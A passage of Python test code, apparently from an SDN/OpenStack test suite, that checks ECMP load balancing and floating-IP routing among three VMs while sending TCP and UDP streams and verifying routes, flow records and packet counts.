        '''Test communication between three VMs which have borrowed the FIP from a common FIP pool. Delete two of the VMs and check that traffic flow is unaffected.
'''
result = True
self.fip_pool_name = self.res.fip_pool_name
fvn = self.res.fvn
vn1 = self.res.vn1
vn2 = self.res.vn2
vn3 = self.res.vn3
my_fip = self.res.my_fip
agent_tap_intf_list = {}
tap_intf_list = []
a_list = []
dport1 = self.res.dport1
dport2 = self.res.dport2
dport3 = self.res.dport3
udp_src = self.res.udp_src
vm1 = self.res.vm1
vm2 = self.res.vm2
vm3 = self.res.vm3
fvn_vm1 = self.res.fvn_vm1
vm_node_ips = []
vm_node_ips.append(vm1.vm_node_ip)
if (vm1.vm_node_ip != vm2.vm_node_ip):
vm_node_ips.append(vm2.vm_node_ip)
if (vm1.vm_node_ip != vm3.vm_node_ip):
vm_node_ips.append(vm3.vm_node_ip)
self.logger.info("-" * 80)
self.logger.info('Starting TCP Traffic from fvn_vm1 to 30.1.1.3')
self.logger.info("-" * 80)
vm_list = []
vm_list = [vm1, vm2, vm3]
profile = {}
sender = {}
receiver = {}
stream1 = Stream(protocol="ip", proto="tcp", src=fvn_vm1.vm_ip,
dst=my_fip, sport=udp_src, dport=dport1)
stream2 = Stream(protocol="ip", proto="tcp", src=fvn_vm1.vm_ip,
dst=my_fip, sport=udp_src, dport=dport2)
stream3 = Stream(protocol="ip", proto="tcp", src=fvn_vm1.vm_ip,
dst=my_fip, sport=udp_src, dport=dport3)
stream_list = [stream1, stream2, stream3]
tx_vm_node_ip = self.inputs.host_data[
self.nova_h.get_nova_host_of_vm(fvn_vm1.vm_obj)]['host_ip']
tx_local_host = Host(
tx_vm_node_ip,
self.inputs.host_data[tx_vm_node_ip]['username'],
self.inputs.host_data[tx_vm_node_ip]['password'])
send_host = Host(fvn_vm1.local_ip, fvn_vm1.vm_username,
fvn_vm1.vm_password)
rx_vm_node_ip = {}
rx_local_host = {}
recv_host = {}
for vm in vm_list:
rx_vm_node_ip[vm] = self.inputs.host_data[
self.nova_h.get_nova_host_of_vm(vm.vm_obj)]['host_ip']
rx_local_host[vm] = Host(
rx_vm_node_ip[vm],
self.inputs.host_data[vm.vm_node_ip]['username'],
self.inputs.host_data[vm.vm_node_ip]['password'])
recv_host[vm] = Host(vm.local_ip, vm.vm_username, vm.vm_password)
count = 0
for stream in stream_list:
profile[stream] = {}
sender[stream] = {}
receiver[stream] = {}
for vm in vm_list:
count = count + 1
send_filename = 'sendtcp_%s' % count
recv_filename = 'recvtcp_%s' % count
profile[stream][vm] = ContinuousProfile(
stream=stream, listener=vm.vm_ip, chksum=True)
sender[stream][vm] = Sender(
send_filename, profile[stream][vm], tx_local_host, send_host, self.inputs.logger)
receiver[stream][vm] = Receiver(
recv_filename, profile[stream][vm], rx_local_host[vm], recv_host[vm], self.inputs.logger)
receiver[stream][vm].start()
sender[stream][vm].start()
self.logger.info('Sending traffic for 10 seconds')
time.sleep(10)
self.logger.info(
'Will disassociate the fip address from two VMs and check that there should be no traffic loss.')
self.res.fip_obj.del_virtual_machine_interface(self.res.vm1_intf)
self.res.vnc_lib.floating_ip_update(self.res.fip_obj)
self.res.fip_obj.del_virtual_machine_interface(self.res.vm3_intf)
self.res.vnc_lib.floating_ip_update(self.res.fip_obj)
self.logger.info('Get the Route Entry in the control node')
for vm_node_ip in vm_node_ips:
active_controller = None
inspect_h1 = self.agent_inspect[vm_node_ip]
agent_xmpp_status = inspect_h1.get_vna_xmpp_connection_status()
for entry in agent_xmpp_status:
if entry['cfg_controller'] == 'Yes':
active_controller = entry['controller_ip']
self.logger.info(
'Active control node from the Agent %s is %s' %
(vm_node_ip, active_controller))
sleep(5)
route_entry = self.cn_inspect[active_controller].get_cn_route_table_entry(
ri_name=self.res.fvn_ri_name, prefix='30.1.1.3/32')
self.logger.info('Route_entry in the control node is %s' % route_entry)
result = True
if route_entry:
self.logger.info(
'Route Entry found in the Active Control-Node %s' %
(active_controller))
else:
result = False
assert result, 'Route Entry not found in the Active Control-Node %s' % (
active_controller)
self.logger.info(
'Get the FIP list and verify the vrf_name and address in the VMI')
fip_addr_vm1 = self.res.vm1.chk_vmi_for_fip(self.res.vn1_fq_name)
fip_addr_vm2 = self.res.vm2.chk_vmi_for_fip(self.res.vn2_fq_name)
fip_addr_vm3 = self.res.vm3.chk_vmi_for_fip(self.res.vn3_fq_name)
fip_vrf_entry_vm1 = self.res.vm1.chk_vmi_for_vrf_entry(
self.res.vn1_fq_name)
fip_vrf_entry_vm2 = self.res.vm2.chk_vmi_for_vrf_entry(
self.res.vn2_fq_name)
fip_vrf_entry_vm3 = self.res.vm3.chk_vmi_for_vrf_entry(
self.res.vn3_fq_name)
self.logger.info(
'The vrf_entry on the VMI of %s is %s, on %s is %s and on %s is %s' %
(self.res.vm1.vm_name, fip_vrf_entry_vm1, self.res.vm2.vm_name, fip_vrf_entry_vm2, self.res.vm3.vm_name, fip_vrf_entry_vm3))
if ((fip_vrf_entry_vm2 == self.res.fvn_vrf_name) and all(x == None for x in (fip_vrf_entry_vm1, fip_vrf_entry_vm3))):
self.logger.info('Correct FIP VRF Entries seen ')
else:
result = False
assert result, 'Incorrect FIP VRF Entries seen'
self.logger.info(
'The FIP address assigned to %s is %s, to %s is %s and to %s is %s' %
(vm1.vm_name, fip_addr_vm1, vm2.vm_name, fip_addr_vm2, vm3.vm_name, fip_addr_vm3))
if ((fip_addr_vm2 == my_fip) and all(x == None for x in (fip_addr_vm1, fip_addr_vm3))):
self.logger.info('FIP Address assigned correctly ')
else:
result = False
assert result, 'FIP Address assignment incorrect'
for stream in stream_list:
for vm in vm_list:
sender[stream][vm].stop()
for stream in stream_list:
for vm in vm_list:
receiver[stream][vm].stop()
stream_sent_count = {}
stream_recv_count = {}
result = True
for stream in stream_list:
stream_sent_count[stream] = 0
stream_recv_count[stream] = 0
for vm in vm_list:
stream_sent_count[stream] = stream_sent_count[stream] + \
sender[stream][vm].sent
stream_recv_count[stream] = stream_recv_count[stream] + \
receiver[stream][vm].recv
if abs(stream_recv_count[stream] - stream_sent_count[stream]) < 5:
self.logger.info(
'%s packets sent and %s packets received in Stream after disassociating ' %
(stream_sent_count[stream], stream_recv_count[stream]))
else:
result = False
assert result, '%s packets sent and %s packets received in Stream' % (
stream_sent_count[stream], stream_recv_count[stream])
return True
# end test_ecmp_to_non_ecmp_bw_three_vms_same_fip
@preposttest_wrapper
def test_ecmp_bw_three_vms_same_fip_delete_add_fip(self):
        '''Test communication between three VMs which have borrowed the FIP from a common FIP pool. Delete one of the VMs and check that ECMP still holds good. Add a VM later and check that ECMP continues between the three VMs.
'''
result = True
self.fip_pool_name = self.res.fip_pool_name
fvn = self.res.fvn
vn1 = self.res.vn1
vn2 = self.res.vn2
vn3 = self.res.vn3
my_fip = self.res.my_fip
agent_tap_intf_list = {}
tap_intf_list = []
a_list = []
dport1 = self.res.dport1
dport2 = self.res.dport2
dport3 = self.res.dport3
udp_src = self.res.udp_src
vm1 = self.res.vm1
vm2 = self.res.vm2
vm3 = self.res.vm3
fvn_vm1 = self.res.fvn_vm1
(domain, project, vn2) = self.res.vn2_fq_name.split(':')
(domain, project, fvn) = self.res.fvn_fq_name.split(':')
(domain, project, vn1) = self.res.vn1_fq_name.split(':')
(domain, project, vn3) = self.res.vn3_fq_name.split(':')
vm_node_ips = []
vm_node_ips.append(vm1.vm_node_ip)
if (vm1.vm_node_ip != vm2.vm_node_ip):
vm_node_ips.append(vm2.vm_node_ip)
if (vm1.vm_node_ip != vm3.vm_node_ip):
vm_node_ips.append(vm3.vm_node_ip)
self.logger.info("-" * 80)
self.logger.info('Starting TCP Traffic from fvn_vm1 to 30.1.1.3')
self.logger.info("-" * 80)
vm_list = []
vm_list = [vm1, vm2, vm3]
profile = {}
sender = {}
receiver = {}
stream1 = Stream(protocol="ip", proto="tcp", src=fvn_vm1.vm_ip,
dst=my_fip, sport=udp_src, dport=dport1)
stream2 = Stream(protocol="ip", proto="tcp", src=fvn_vm1.vm_ip,
dst=my_fip, sport=udp_src, dport=dport2)
stream3 = Stream(protocol="ip", proto="tcp", src=fvn_vm1.vm_ip,
dst=my_fip, sport=udp_src, dport=dport3)
stream_list = [stream1, stream2, stream3]
tx_vm_node_ip = self.inputs.host_data[
self.nova_h.get_nova_host_of_vm(fvn_vm1.vm_obj)]['host_ip']
tx_local_host = Host(
tx_vm_node_ip,
self.inputs.host_data[tx_vm_node_ip]['username'],
self.inputs.host_data[tx_vm_node_ip]['password'])
send_host = Host(fvn_vm1.local_ip, fvn_vm1.vm_username,
fvn_vm1.vm_password)
rx_vm_node_ip = {}
rx_local_host = {}
recv_host = {}
for vm in vm_list:
rx_vm_node_ip[vm] = self.inputs.host_data[
self.nova_h.get_nova_host_of_vm(vm.vm_obj)]['host_ip']
rx_local_host[vm] = Host(
rx_vm_node_ip[vm],
self.inputs.host_data[vm.vm_node_ip]['username'],
self.inputs.host_data[vm.vm_node_ip]['password'])
recv_host[vm] = Host(vm.local_ip, vm.vm_username, vm.vm_password)
count = 0
for stream in stream_list:
profile[stream] = {}
sender[stream] = {}
receiver[stream] = {}
for vm in vm_list:
count = count + 1
send_filename = 'sendtcp_%s' % count
recv_filename = 'recvtcp_%s' % count
profile[stream][vm] = ContinuousProfile(
stream=stream, listener=vm.vm_ip, chksum=True)
sender[stream][vm] = Sender(
send_filename, profile[stream][vm], tx_local_host, send_host, self.inputs.logger)
receiver[stream][vm] = Receiver(
recv_filename, profile[stream][vm], rx_local_host[vm], recv_host[vm], self.inputs.logger)
receiver[stream][vm].start()
sender[stream][vm].start()
self.logger.info('Sending traffic for 10 seconds')
time.sleep(10)
self.logger.info(
'Will disassociate the fip address from one of the VMs and check if ECMP still exists between the other two')
self.logger.info('There should be no packet loss')
self.res.fip_obj.del_virtual_machine_interface(self.res.vm1_intf)
self.res.vnc_lib.floating_ip_update(self.res.fip_obj)
self.logger.info('Get the Route Entry in the control node')
for vm_node_ip in vm_node_ips:
active_controller = None
inspect_h1 = self.agent_inspect[vm_node_ip]
agent_xmpp_status = inspect_h1.get_vna_xmpp_connection_status()
for entry in agent_xmpp_status:
if entry['cfg_controller'] == 'Yes':
active_controller = entry['controller_ip']
self.logger.info(
'Active control node from the Agent %s is %s' %
(vm_node_ip, active_controller))
sleep(5)
route_entry = self.cn_inspect[active_controller].get_cn_route_table_entry(
ri_name=self.res.fvn_ri_name, prefix='30.1.1.3/32')
self.logger.info('Route_entry in the control node is %s' % route_entry)
result = True
if route_entry:
self.logger.info(
'Route Entry found in the Active Control-Node %s' %
(active_controller))
else:
result = False
assert result, 'Route Entry not found in the Active Control-Node %s' % (
active_controller)
self.logger.info(
'Get the FIP list and verify the vrf_name and address in the VMI')
fip_addr_vm1 = self.res.vm1.chk_vmi_for_fip(self.res.vn1_fq_name)
fip_addr_vm2 = self.res.vm2.chk_vmi_for_fip(self.res.vn2_fq_name)
fip_addr_vm3 = self.res.vm3.chk_vmi_for_fip(self.res.vn3_fq_name)
fip_vrf_entry_vm1 = self.res.vm1.chk_vmi_for_vrf_entry(
self.res.vn1_fq_name)
fip_vrf_entry_vm2 = self.res.vm2.chk_vmi_for_vrf_entry(
self.res.vn2_fq_name)
fip_vrf_entry_vm3 = self.res.vm3.chk_vmi_for_vrf_entry(
self.res.vn3_fq_name)
self.logger.info(
'The vrf_entry on the VMI of %s is %s, on %s is %s and on %s is %s' %
(self.res.vm1.vm_name, fip_vrf_entry_vm1, self.res.vm2.vm_name, fip_vrf_entry_vm2, self.res.vm3.vm_name, fip_vrf_entry_vm3))
if ((fip_vrf_entry_vm1 == None) and all(x == self.res.fvn_vrf_name for x in (fip_vrf_entry_vm2, fip_vrf_entry_vm3))):
self.logger.info('Correct FIP VRF Entries seen ')
else:
result = False
assert result, 'Incorrect FIP VRF Entries seen'
self.logger.info(
'The FIP address assigned to %s is %s, to %s is %s and to %s is %s' %
(vm1.vm_name, fip_addr_vm1, vm2.vm_name, fip_addr_vm2, vm3.vm_name, fip_addr_vm3))
if ((fip_addr_vm1 == None) and all(x == my_fip for x in (fip_addr_vm2, fip_addr_vm3))):
self.logger.info('FIP Address assigned correctly ')
else:
result = False
assert result, 'FIP Address assignment incorrect'
self.logger.info('Check for the FIP route entry')
for vm_node_ip in vm_node_ips:
tap_intf_list = []
inspect_h9 = self.agent_inspect[vm_node_ip]
agent_vrf_objs = inspect_h9.get_vna_vrf_objs(domain, project, fvn)
agent_vrf_obj = self.get_matching_vrf(
agent_vrf_objs['vrf_list'], self.res.fvn_vrf_name)
fvn_vrf_id9 = agent_vrf_obj['ucindex']
paths = inspect_h9.get_vna_active_route(
vrf_id=fvn_vrf_id9, ip=self.res.my_fip, prefix='32')['path_list']
self.logger.info('There are %s nexthops to %s on Agent %s' %
(len(paths), self.res.my_fip, vm_node_ip))
next_hops = inspect_h9.get_vna_active_route(
vrf_id=fvn_vrf_id9, ip=self.res.my_fip, prefix='32')['path_list'][0]['nh']['mc_list']
if not next_hops:
result = False
assert result, 'Route not found in the Agent %s' % vm_node_ip
else:
self.logger.info('Route found in the Agent %s' % vm_node_ip)
for nh in next_hops:
label = nh['label']
if nh['type'] == 'Tunnel':
destn_agent = nh['dip']
inspect_hh = self.agent_inspect[destn_agent]
agent_vrf_objs = inspect_hh.get_vna_vrf_objs(
domain, project, fvn)
agent_vrf_obj = self.get_matching_vrf(
agent_vrf_objs['vrf_list'], self.res.fvn_vrf_name)
fvn_vrf_id5 = agent_vrf_obj['ucindex']
next_hops_in_tnl = inspect_hh.get_vna_active_route(
vrf_id=fvn_vrf_id5, ip=self.res.my_fip, prefix='32')['path_list'][0]['nh']['mc_list']
for next_hop in next_hops_in_tnl:
if next_hop['type'] == 'Interface':
tap_intf_from_tnl = next_hop['itf']
tap_intf_list.append(tap_intf_from_tnl)
elif nh['type'] == 'Interface':
tap_intf = nh['itf']
tap_intf_list.append(tap_intf)
agent_tap_intf_list[vm_node_ip] = tap_intf_list
self.logger.info('The list of Tap interfaces from the agents are %s' %
agent_tap_intf_list)
# a_list= agent_tap_intf_list.values()
# result= all(x == a_list[0] for x in a_list)
#
# if result == True:
# self.logger.info('The Tap interface list is the same across agents')
# else:
# assert result, 'The Tap interface list across agents is incorrect'
for stream in stream_list:
for vm in vm_list:
sender[stream][vm].stop()
for stream in stream_list:
for vm in vm_list:
receiver[stream][vm].stop()
sleep(10)
stream_sent_count = {}
stream_recv_count = {}
result = True
for stream in stream_list:
stream_sent_count[stream] = 0
stream_recv_count[stream] = 0
for vm in vm_list:
stream_sent_count[stream] = stream_sent_count[stream] + \
sender[stream][vm].sent
stream_recv_count[stream] = stream_recv_count[stream] + \
receiver[stream][vm].recv
if abs(stream_recv_count[stream] - stream_sent_count[stream]) < 5:
self.logger.info(
'%s packets sent and %s packets received in Stream after disassociating ' %
(stream_sent_count[stream], stream_recv_count[stream]))
else:
result = False
assert result, '%s packets sent and %s packets received in Stream after disassociating' % (
stream_sent_count[stream], stream_recv_count[stream])
self.logger.info("-" * 80)
self.logger.info('Starting TCP Traffic again from fvn_vm1 to 30.1.1.3')
self.logger.info("-" * 80)
vm_list = []
vm_list = [vm1, vm2, vm3]
profile = {}
sender = {}
receiver = {}
stream1 = Stream(protocol="ip", proto="tcp", src=fvn_vm1.vm_ip,
dst=my_fip, sport=udp_src, dport=dport1)
stream2 = Stream(protocol="ip", proto="tcp", src=fvn_vm1.vm_ip,
dst=my_fip, sport=udp_src, dport=dport2)
stream3 = Stream(protocol="ip", proto="tcp", src=fvn_vm1.vm_ip,
dst=my_fip, sport=udp_src, dport=dport3)
stream_list = [stream1, stream2, stream3]
tx_vm_node_ip = self.inputs.host_data[
self.nova_h.get_nova_host_of_vm(fvn_vm1.vm_obj)]['host_ip']
tx_local_host = Host(
tx_vm_node_ip,
self.inputs.host_data[tx_vm_node_ip]['username'],
self.inputs.host_data[tx_vm_node_ip]['password'])
send_host = Host(fvn_vm1.local_ip, fvn_vm1.vm_username,
fvn_vm1.vm_password)
rx_vm_node_ip = {}
rx_local_host = {}
recv_host = {}
for vm in vm_list:
rx_vm_node_ip[vm] = self.inputs.host_data[
self.nova_h.get_nova_host_of_vm(vm.vm_obj)]['host_ip']
rx_local_host[vm] = Host(
rx_vm_node_ip[vm],
self.inputs.host_data[vm.vm_node_ip]['username'],
self.inputs.host_data[vm.vm_node_ip]['password'])
recv_host[vm] = Host(vm.local_ip, vm.vm_username, vm.vm_password)
count = 0
for stream in stream_list:
profile[stream] = {}
sender[stream] = {}
receiver[stream] = {}
for vm in vm_list:
count = count + 1
send_filename = 'sendtcp_%s' % count
recv_filename = 'recvtcp_%s' % count
profile[stream][vm] = ContinuousProfile(
stream=stream, listener=vm.vm_ip, chksum=True)
sender[stream][vm] = Sender(
send_filename, profile[stream][vm], tx_local_host, send_host, self.inputs.logger)
receiver[stream][vm] = Receiver(
recv_filename, profile[stream][vm], rx_local_host[vm], recv_host[vm], self.inputs.logger)
receiver[stream][vm].start()
sender[stream][vm].start()
self.logger.info('Sending traffic for 10 seconds')
time.sleep(10)
self.logger.info(
'Will re-associate the fip address from one of the VMs and check if ECMP holds ')
self.logger.info(
'There should be no packet loss in the traffic stream')
self.res.fip_obj.add_virtual_machine_interface(self.res.vm1_intf)
self.res.vnc_lib.floating_ip_update(self.res.fip_obj)
sleep(10)
self.logger.info(
'Get the FIP list again and verify the vrf_name and address in the VMI')
fip_addr_vm1 = self.res.vm1.chk_vmi_for_fip(self.res.vn1_fq_name)
fip_addr_vm2 = self.res.vm2.chk_vmi_for_fip(self.res.vn2_fq_name)
fip_addr_vm3 = self.res.vm3.chk_vmi_for_fip(self.res.vn3_fq_name)
fip_vrf_entry_vm1 = self.res.vm1.chk_vmi_for_vrf_entry(
self.res.vn1_fq_name)
fip_vrf_entry_vm2 = self.res.vm2.chk_vmi_for_vrf_entry(
self.res.vn2_fq_name)
fip_vrf_entry_vm3 = self.res.vm3.chk_vmi_for_vrf_entry(
self.res.vn3_fq_name)
self.logger.info(
'The vrf_entry on the VMI of %s is %s, on %s is %s and on %s is %s' %
(self.res.vm1.vm_name, fip_vrf_entry_vm1, self.res.vm2.vm_name, fip_vrf_entry_vm2, self.res.vm3.vm_name, fip_vrf_entry_vm3))
if all(x == self.res.fvn_vrf_name for x in (fip_vrf_entry_vm1, fip_vrf_entry_vm2, fip_vrf_entry_vm3)):
self.logger.info('Correct FIP VRF Entries seen ')
else:
result = False
assert result, 'Incorrect FIP VRF Entries seen'
self.logger.info(
'The FIP address assigned to %s is %s, to %s is %s and to %s is %s' %
(vm1.vm_name, fip_addr_vm1, vm2.vm_name, fip_addr_vm2, vm3.vm_name, fip_addr_vm3))
if all(x == my_fip for x in (fip_addr_vm1, fip_addr_vm2, fip_addr_vm3)):
self.logger.info('FIP Address assigned correctly ')
else:
result = False
assert result, 'FIP Address assignment incorrect'
self.logger.info('Check for the FIP route entry')
for vm_node_ip in vm_node_ips:
tap_intf_list = []
inspect_h9 = self.agent_inspect[vm_node_ip]
agent_vrf_objs = inspect_h9.get_vna_vrf_objs(domain, project, fvn)
agent_vrf_obj = self.get_matching_vrf(
agent_vrf_objs['vrf_list'], self.res.fvn_vrf_name)
fvn_vrf_id9 = agent_vrf_obj['ucindex']
paths = inspect_h9.get_vna_active_route(
vrf_id=fvn_vrf_id9, ip=self.res.my_fip, prefix='32')['path_list']
self.logger.info('There are %s nexthops to %s on Agent %s' %
(len(paths), self.res.my_fip, vm_node_ip))
next_hops = inspect_h9.get_vna_active_route(
vrf_id=fvn_vrf_id9, ip=self.res.my_fip, prefix='32')['path_list'][0]['nh']['mc_list']
if not next_hops:
result = False
assert result, 'Route not found in the Agent %s' % vm_node_ip
else:
self.logger.info('Route found in the Agent %s' % vm_node_ip)
for nh in next_hops:
label = nh['label']
if nh['type'] == 'Tunnel':
destn_agent = nh['dip']
inspect_hh = self.agent_inspect[destn_agent]
agent_vrf_objs = inspect_hh.get_vna_vrf_objs(
domain, project, fvn)
agent_vrf_obj = self.get_matching_vrf(
agent_vrf_objs['vrf_list'], self.res.fvn_vrf_name)
fvn_vrf_id5 = agent_vrf_obj['ucindex']
next_hops_in_tnl = inspect_hh.get_vna_active_route(
vrf_id=fvn_vrf_id5, ip=self.res.my_fip, prefix='32')['path_list'][0]['nh']['mc_list']
for next_hop in next_hops_in_tnl:
if next_hop['type'] == 'Interface':
tap_intf_from_tnl = next_hop['itf']
tap_intf_list.append(tap_intf_from_tnl)
elif nh['type'] == 'Interface':
tap_intf = nh['itf']
tap_intf_list.append(tap_intf)
agent_tap_intf_list[vm_node_ip] = tap_intf_list
self.logger.info('The list of Tap interfaces from the agents are %s' %
agent_tap_intf_list)
# a_list= agent_tap_intf_list.values()
# result= all(x == a_list[0] for x in a_list)
#
# if result == True:
# self.logger.info('The Tap interface list is the same across agents')
# else:
# assert result, 'The Tap interface list across agents is incorrect'
for stream in stream_list:
for vm in vm_list:
sender[stream][vm].stop()
for stream in stream_list:
for vm in vm_list:
receiver[stream][vm].stop()
sleep(10)
stream_sent_count = {}
stream_recv_count = {}
result = True
for stream in stream_list:
stream_sent_count[stream] = 0
stream_recv_count[stream] = 0
for vm in vm_list:
stream_sent_count[stream] = stream_sent_count[stream] + \
sender[stream][vm].sent
stream_recv_count[stream] = stream_recv_count[stream] + \
receiver[stream][vm].recv
if abs(stream_recv_count[stream] - stream_sent_count[stream]) < 5:
self.logger.info(
'%s packets sent and %s packets received in Stream after associating the FIP address back' %
(stream_sent_count[stream], stream_recv_count[stream]))
else:
result = False
assert result, '%s packets sent and %s packets received in Stream after associating the FIP address back' % (
stream_sent_count[stream], stream_recv_count[stream])
self.logger.info('Checking Flow Records')
flow_result = False
flow_result2 = False
flow_result3 = False
rev_flow_result = False
rev_flow_result1 = False
rev_flow_result2 = False
vn1_vrf_id = vm1.get_vrf_id(
self.res.vn1_fq_name, self.res.vn1_vrf_name)
vn2_vrf_id = vm2.get_vrf_id(
self.res.vn2_fq_name, self.res.vn2_vrf_name)
vn3_vrf_id = vm3.get_vrf_id(
self.res.vn3_fq_name, self.res.vn3_vrf_name)
fvn_vrf_id = fvn_vm1.get_vrf_id(
self.res.fvn_fq_name, self.res.fvn_vrf_name)
for vm_node_ip in vm_node_ips:
inspect_h100 = self.agent_inspect[vm_node_ip]
flow_rec1 = None
flow_rec2 = None
flow_rec3 = None
dpi1 = unicode(self.res.dport1)
dpi2 = unicode(self.res.dport2)
dpi3 = unicode(self.res.dport3)
flow_rec1 = inspect_h100.get_vna_fetchflowrecord(
vrf=fvn_vrf_id, sip=fvn_vm1.vm_ip, dip=self.res.my_fip, sport=self.res.udp_src, dport=dpi1, protocol='6')
flow_rec2 = inspect_h100.get_vna_fetchflowrecord(
vrf=fvn_vrf_id, sip=fvn_vm1.vm_ip, dip=self.res.my_fip, sport=self.res.udp_src, dport=dpi2, protocol='6')
flow_rec3 = inspect_h100.get_vna_fetchflowrecord(
vrf=fvn_vrf_id, sip=fvn_vm1.vm_ip, dip=self.res.my_fip, sport=self.res.udp_src, dport=dpi3, protocol='6')
if flow_rec1 is not None:
flow_result = True
self.logger.info(
'Flow from %s:%s to %s:%s exists on Agent %s' %
(fvn_vm1.vm_ip, self.res.udp_src, self.res.my_fip, dpi1, vm_node_ip))
else:
flow_result = flow_result or False
self.logger.info('No Flow from %s:%s to %s:%s on Agent %s' %
(fvn_vm1.vm_ip, self.res.udp_src, self.res.my_fip, dpi1, vm_node_ip))
if flow_rec2 is not None:
flow_result2 = True
self.logger.info(
'Flow from %s:%s to %s:%s exists on Agent %s' %
(fvn_vm1.vm_ip, self.res.udp_src, self.res.my_fip, dpi2, vm_node_ip))
else:
flow_result2 = flow_result2 or False
self.logger.info('No Flow from %s:%s to %s:%s on Agent %s' %
(fvn_vm1.vm_ip, self.res.udp_src, self.res.my_fip, dpi2, vm_node_ip))
if flow_rec3 is not None:
flow_result3 = True
self.logger.info(
'Flow from %s:%s to %s:%s exists on Agent %s' %
(fvn_vm1.vm_ip, self.res.udp_src, self.res.my_fip, dpi3, vm_node_ip))
else:
flow_result3 = flow_result3 or False
self.logger.info('No Flow from %s:%s to %s:%s on Agent %s' %
(fvn_vm1.vm_ip, self.res.udp_src, self.res.my_fip, dpi3, vm_node_ip))
dpi_list = [dpi1, dpi2, dpi3]
rev_flow_rec1 = {}
rev_flow_rec2 = {}
rev_flow_rec3 = {}
rev_flow_result1 = True
rev_flow_result2 = True
rev_flow_result3 = True
for dpi in dpi_list:
rev_flow_rec1[dpi] = inspect_h100.get_vna_fetchflowrecord(
vrf=vn1_vrf_id, sip=vm1.vm_ip, dip=fvn_vm1.vm_ip, sport=dpi, dport=self.res.udp_src, protocol='6')
rev_flow_rec2[dpi] = inspect_h100.get_vna_fetchflowrecord(
vrf=vn2_vrf_id, sip=vm2.vm_ip, dip=fvn_vm1.vm_ip, sport=dpi, dport=self.res.udp_src, protocol='6')
rev_flow_rec3[dpi] = inspect_h100.get_vna_fetchflowrecord(
vrf=vn3_vrf_id, sip=vm3.vm_ip, dip=fvn_vm1.vm_ip, sport=dpi, dport=self.res.udp_src, protocol='6')
if rev_flow_rec1[dpi]:
self.logger.info(
'Reverse Flow from %s to %s exists on Agent %s' %
(vm1.vm_ip, fvn_vm1.vm_ip, vm_node_ip))
rev_flow_result1 = rev_flow_result1 or False
if rev_flow_rec2[dpi]:
self.logger.info(
'Reverse Flow from %s to %s exists on Agent %s' %
(vm2.vm_ip, fvn_vm1.vm_ip, vm_node_ip))
rev_flow_result2 = rev_flow_result2 or False
if rev_flow_rec3[dpi]:
self.logger.info(
'Reverse Flow from %s to %s exists on Agent %s' %
(vm3.vm_ip, fvn_vm1.vm_ip, vm_node_ip))
rev_flow_result3 = rev_flow_result3 or False
assert flow_result, 'Records for the flow between %s:%s and %s:%s not seen on any of the agents' % (
fvn_vm1.vm_ip, self.res.udp_src, self.res.my_fip, dpi1)
assert flow_result2, 'Records for the flow between %s:%s and %s:%s not seen on any of the agents' % (
fvn_vm1.vm_ip, self.res.udp_src, self.res.my_fip, dpi2)
assert flow_result3, 'Records for the flow between %s:%s and %s:%s not seen on any of the agents' % (
fvn_vm1.vm_ip, self.res.udp_src, self.res.my_fip, dpi3)
assert (
rev_flow_result3 or rev_flow_result1 or rev_flow_result2), 'Records for the reverse flow not seen on any of the agents'
return True
# end test_ecmp_bw_three_vms_same_fip_delete_add_fip
@preposttest_wrapper
def test_ecmp_bw_three_vms_same_fip_incr_sport(self):
        '''Test communication between three VMs which have borrowed the FIP from a common FIP pool. Increment the source port (sport) to set up three flows.
'''
result = True
self.fip_pool_name = self.res.fip_pool_name
fvn = self.res.fvn
vn1 = self.res.vn1
vn2 = self.res.vn2
vn3 = self.res.vn3
my_fip = self.res.my_fip
agent_tap_intf_list = {}
tap_intf_list = []
a_list = []
dport1 = self.res.dport1
dport2 = self.res.dport2
dport3 = self.res.dport3
udp_src = self.res.udp_src
vm1 = self.res.vm1
vm2 = self.res.vm2
vm3 = self.res.vm3
fvn_vm1 = self.res.fvn_vm1
vm_node_ips = []
vm_node_ips.append(vm1.vm_node_ip)
if (vm1.vm_node_ip != vm2.vm_node_ip):
vm_node_ips.append(vm2.vm_node_ip)
if (vm1.vm_node_ip != vm3.vm_node_ip):
vm_node_ips.append(vm3.vm_node_ip)
self.logger.info("-" * 100)
self.logger.info(
'Starting the following UDP flows : %s:10000-->30.1.1.3, %s:11000-->30.1.1.3, %s:12000-->30.1.1.3' %
(fvn_vm1.vm_ip, fvn_vm1.vm_ip, fvn_vm1.vm_ip))
self.logger.info("-" * 100)
vm_list = []
vm_list = [vm1, vm2, vm3]
fvm_list = [fvn_vm1]
profile = {}
sender = {}
receiver = {}
stream1 = Stream(protocol="ip", proto="udp", src=fvn_vm1.vm_ip,
dst=my_fip, sport=unicode(10000), dport=dport1)
stream2 = Stream(protocol="ip", proto="udp", src=fvn_vm1.vm_ip,
dst=my_fip, sport=unicode(11000), dport=dport1)
stream3 = Stream(protocol="ip", proto="udp", src=fvn_vm1.vm_ip,
dst=my_fip, sport=unicode(12000), dport=dport1)
stream_list = [stream1, stream2, stream3]
tx_vm_node_ip = self.inputs.host_data[
self.nova_h.get_nova_host_of_vm(fvn_vm1.vm_obj)]['host_ip']
tx_local_host = Host(
tx_vm_node_ip,
self.inputs.host_data[tx_vm_node_ip]['username'],
self.inputs.host_data[tx_vm_node_ip]['password'])
send_host = Host(fvn_vm1.local_ip, fvn_vm1.vm_username,
fvn_vm1.vm_password)
rx_vm_node_ip = {}
rx_local_host = {}
recv_host = {}
for vm in vm_list:
rx_vm_node_ip[vm] = self.inputs.host_data[
self.nova_h.get_nova_host_of_vm(vm.vm_obj)]['host_ip']
rx_local_host[vm] = Host(
rx_vm_node_ip[vm],
self.inputs.host_data[vm.vm_node_ip]['username'],
self.inputs.host_data[vm.vm_node_ip]['password'])
recv_host[vm] = Host(vm.local_ip, vm.vm_username, vm.vm_password)
count = 0
for stream in stream_list:
profile[stream] = {}
receiver[stream] = {}
for vm in vm_list:
count = count + 1
recv_filename = 'recvudp_%s' % count
profile[stream][vm] = ContinuousProfile(
stream=stream, listener=vm.vm_ip, chksum=True)
receiver[stream][vm] = Receiver(
recv_filename, profile[stream][vm], rx_local_host[vm], recv_host[vm], self.inputs.logger)
receiver[stream][vm].start()
for i in range(len(stream_list)):
profile[i] = {}
sender[i] = {}
count = count + 1
send_filename = 'sendudp_%s' % count
profile[i] = ContinuousProfile(stream=stream_list[i], chksum=True)
sender[i] = Sender(send_filename, profile[i],
tx_local_host, send_host, self.inputs.logger)
sender[i].start()
self.logger.info('Sending traffic for 10 seconds')
sleep(10)
for i in range(len(stream_list)):
sender[i].stop()
for stream in stream_list:
for vm in vm_list:
receiver[stream][vm].stop()
stream_sent_count = 0
